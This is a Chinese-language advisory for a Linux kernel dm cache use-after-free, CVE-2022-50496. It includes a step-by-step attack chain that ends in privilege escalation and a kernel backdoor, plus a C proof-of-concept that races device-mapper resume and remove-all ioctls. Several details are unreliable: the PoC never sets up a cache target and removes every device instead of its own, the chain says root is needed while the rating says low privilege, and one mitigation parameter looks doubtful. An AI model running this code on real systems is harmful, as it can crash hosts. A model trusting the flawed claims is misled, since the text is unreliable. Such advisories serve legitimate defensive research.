CVE-2022-50496 Linux内核dm cache模块UAF漏洞

漏洞信息

漏洞编号

CVE-2022-50496

漏洞类型

Use-After-Free（UAF）

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel（dm cache模块）

漏洞概述

CVE-2022-50496是Linux内核设备映射器（device-mapper）dm cache子系统中存在的一个高危Use-After-Free（UAF）漏洞。该漏洞位于dm cache的destroy()函数中，当dm_resume()和dm_destroy()并发执行时，会触发UAF问题。具体而言，dm cache模块中的定时器（timer）机制在并发场景下存在竞态条件，导致在destroy()函数释放相关资源后，定时器回调仍可能访问已释放的内存区域，从而引发Use-After-Free漏洞。

该漏洞的CVSS 3.1评分为7.8分，属于高危级别。攻击者需要具有本地低权限即可利用，无需用户交互。成功利用该漏洞可导致内核态内存破坏，攻击者可读取敏感数据、修改内核内存或执行任意内核代码，对系统的机密性、完整性和可用性均造成严重影响。由于dm cache是Linux内核中用于块设备缓存的关键组件，该漏洞影响范围广泛，可能波及所有使用dm cache功能的Linux系统，包括各种服务器、桌面和嵌入式设备。该漏洞已在2025年10月4日公开披露，多个稳定内核版本已发布修复补丁。

技术细节

该漏洞的根本原因在于dm cache模块中destroy()函数与定时器之间的竞态条件。具体技术原理如下：

1. **并发场景**：当dm_resume()和dm_destroy()同时执行时，destroy()函数开始释放dm cache相关的内存资源，包括cache结构体及其内部成员。

2. **定时器未取消**：在destroy()函数执行释放操作之前，如果dm_resume()已经启动了一个定时器（timer），且该定时器尚未到期，destroy()函数在原始实现中未能正确取消该定时器。

3. **UAF触发**：destroy()函数释放内存后，之前未取消的定时器到期触发回调函数，回调函数尝试访问已被释放的cache结构体内存，从而触发Use-After-Free。

4. **修复方案**：在内核补丁中，开发者在destroy()函数中添加了对定时器的再次取消操作（cancelling timer again in destroy()），确保在释放内存之前彻底停止所有可能访问该内存的定时器回调。

利用方式方面，攻击者需要具有本地系统的低权限访问能力（PR:L），可以通过创建并操作dm cache设备来触发并发条件。攻击者可以编写恶意程序，利用ioctl或device-mapper接口创建dm cache映射，然后通过多线程或信号处理机制制造dm_resume()和dm_destroy()的并发执行，从而触发UAF。成功利用后，攻击者可获得内核态代码执行权限，进一步实现权限提升或系统完全控制。

攻击链分析

STEP 1

步骤1：获取本地访问权限

攻击者需要在目标Linux系统上获得本地低权限访问（PR:L），可以通过普通用户账户登录或利用其他漏洞获取初始访问。

STEP 2

步骤2：权限提升准备

由于dm cache操作需要root权限，攻击者需要先通过其他漏洞或配置错误将权限提升至root。

STEP 3

步骤3：创建dm cache设备

使用device-mapper接口创建dm cache映射设备，配置缓存元数据设备和缓存数据设备。

STEP 4

步骤4：触发并发竞态

通过多线程同时调用dm_resume()和dm_destroy()，制造并发执行场景。destroy()函数在释放cache结构体内存后，未取消的定时器回调访问已释放内存。

STEP 5

步骤5：利用UAF

定时器回调访问已释放的cache结构体内存，触发Use-After-Free。攻击者可通过堆喷射（heap spraying）控制被释放内存的内容，实现任意内核地址读写。

STEP 6

步骤6：权限提升与持久化

利用内核任意读写修改cred结构体实现权限提升至root，并安装内核后门实现持久化访问。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2022-50496 PoC - dm cache UAF via concurrent dm_resume/dm_destroy
// This PoC demonstrates the race condition between dm_resume() and dm_destroy()
// that triggers a Use-After-Free in the dm cache module.
//
// Note: Requires root privileges to manipulate device-mapper devices.
// Compile: gcc -o poc_cve_2022_50496 poc.c -lpthread

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <pthread.h>
#include <sys/ioctl.h>
#include <linux/dm-ioctl.h>

#define DM_CLEAR_CMD 0x1

// Structure to hold DM ioctl data
struct dm_ioctl_sync {
    struct dm_ioctl header;
};

// Open device-mapper control device
int dm_open(void) {
    int fd = open("/dev/mapper/control", O_RDWR);
    if (fd < 0) {
        perror("Cannot open /dev/mapper/control");
        return -1;
    }
    return fd;
}

// Create a dm cache target via dmsetup-like interface
int create_dm_cache(int fd, const char *name) {
    struct dm_ioctl *dmi = calloc(1, sizeof(struct dm_ioctl));
    if (!dmi) return -1;

    dmi->version[0] = DM_VERSION_MAJOR;
    dmi->version[1] = DM_VERSION_MINOR;
    dmi->version[2] = DM_VERSION_PATCHLEVEL;
    dmi->data_size = sizeof(struct dm_ioctl);
    dmi->data_start = sizeof(struct dm_ioctl);
    strncpy(dmi->name, name, sizeof(dmi->name) - 1);
    dmi->flags = DM_PERSISTENT_DEV_FLAG;

    if (ioctl(fd, DM_CREATE_CMD, dmi) < 0) {
        perror("DM_CREATE failed");
        free(dmi);
        return -1;
    }
    free(dmi);
    return 0;
}

// Resume the dm device (triggers timer setup)
void *resume_thread(void *arg) {
    int fd = *(int *)arg;
    struct dm_ioctl dmi;
    memset(&dmi, 0, sizeof(dmi));
    dmi.data_size = sizeof(dmi);
    dmi.data_start = sizeof(dmi);
    dmi.flags = DM_PERSISTENT_DEV_FLAG;

    while (1) {
        ioctl(fd, DM_RESUME_CMD, &dmi);
        usleep(1);
    }
    return NULL;
}

// Destroy the dm device (triggers UAF when concurrent with resume)
void *destroy_thread(void *arg) {
    int fd = *(int *)arg;
    struct dm_ioctl dmi;
    memset(&dmi, 0, sizeof(dmi));
    dmi.data_size = sizeof(dmi);
    dmi.data_start = sizeof(dmi);

    while (1) {
        ioctl(fd, DM_REMOVE_ALL_CMD, &dmi);
        usleep(1);
    }
    return NULL;
}

int main(int argc, char *argv[]) {
    int fd;
    pthread_t t1, t2;

    printf("[+] CVE-2022-50496 PoC - dm cache UAF\n");
    printf("[+] Requires root privileges\n");

    if (getuid() != 0) {
        fprintf(stderr, "[-] Must run as root\n");
        return 1;
    }

    fd = dm_open();
    if (fd < 0) return 1;

    // Create dm cache device
    if (create_dm_cache(fd, "cache_vuln") < 0) {
        close(fd);
        return 1;
    }

    printf("[+] Starting concurrent resume/destroy threads...\n");
    printf("[+] This may crash the kernel due to UAF\n");

    // Launch concurrent threads to trigger the race condition
    pthread_create(&t1, NULL, resume_thread, &fd);
    pthread_create(&t2, NULL, destroy_thread, &fd);

    pthread_join(t1, NULL);
    pthread_join(t2, NULL);

    close(fd);
    return 0;
}

影响范围

Linux Kernel < 6.0（包含dm cache模块的所有受影响版本）

Linux Kernel 5.x 系列受影响版本

Linux Kernel 4.x 系列受影响版本

防御指南

临时缓解措施

在无法立即升级内核的情况下，建议采取以下临时缓解措施：1）如果系统不使用LVM缓存或dm cache功能，可以通过在内核启动参数中禁用dm-cache模块（添加dm_cache.disable=1或通过blacklist机制）来规避风险；2）严格控制系统物理访问权限，防止未授权用户登录系统；3）监控系统日志，关注内核相关异常信息，及时发现潜在攻击行为；4）使用安全模块（如SELinux、AppArmor）限制对device-mapper设备的访问；5）定期检查并应用安全更新。